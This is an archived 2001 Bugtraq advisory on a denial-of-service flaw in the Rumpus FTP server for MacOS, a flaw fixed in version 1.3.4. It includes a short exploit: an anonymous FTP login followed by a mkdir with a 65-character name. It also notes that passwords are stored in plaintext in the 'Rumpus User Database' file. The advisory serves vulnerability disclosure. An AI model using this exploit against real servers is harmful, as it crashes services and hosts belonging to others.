Bugtraq mailing list archives
Rumpus FTP DoS
From: Jass Seljamaa <jass () email isp ee>
Date: Tue, 15 May 2001 19:22:38 +0200 (EET)
Maxum(maxum.com) Rumpus FTP server DoS vulnerability Versions Affected: tested on v1.3.3, 2.0 dev 3(MacOS 8.6, 9.1), probably earlier, Not affected: v1.3.4 Description: If you try to make a directory which name is 65 characters long, the Rumpus FTP service and the computer freezes. You can try to force Rumpus to quit, but it never worked for me(always crashed when I pressed the \'Force quit\' button). Also, the passwords are stored in plain text(in prefs folder, a file called \'Rumpus User Database\'), as in most macintosh programs, Maxum Support said to think about encrypting passwords in newer versions. Exploit: ftp 192.168.0.1 user anonymous pass an () nymo us mkdir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaa Solution: Vendor contacted, fixed in version 1.3.4. Jass Seljamaa, jass () isp ee 05212242 ------------------------------------------------- This mail sent through IMP: email.isp.ee
Current thread:
- Rumpus FTP DoS Jass Seljamaa (May 15)